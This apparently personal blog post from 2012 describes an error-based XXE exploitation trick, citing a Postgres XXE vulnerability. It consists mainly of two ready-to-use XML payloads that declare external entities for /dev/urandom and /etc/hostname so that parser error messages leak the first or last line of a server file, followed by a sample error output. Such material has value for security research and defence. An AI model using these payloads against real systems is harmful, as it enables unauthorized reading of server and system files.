четверг, 4 октября 2012 г.

Error-based XXE exploitation trick

Exploiting of XXE vulnerabilities are difficult when you cannot view results XML document.

Recent vulnerability in Postgres XXE are good example of this: entities resolved but not added to XML output. This is common case in the wild.

Bring to your attention easy trick which provide reading first and last lines of ASCII files (which cannot be read by classic XXE attack vector, such as error-based case):

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read first line of file using error-based XXE -->
<root>
&malformed; &wanttoread;
</root>

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read last line of file using error-based XXE -->
<root>
 &wanttoread; &malformed;
</root>

In error message you will look at smth like this:
ERROR: hostnamestr
                                     ^
didn't parse (line: 1 pos: 13)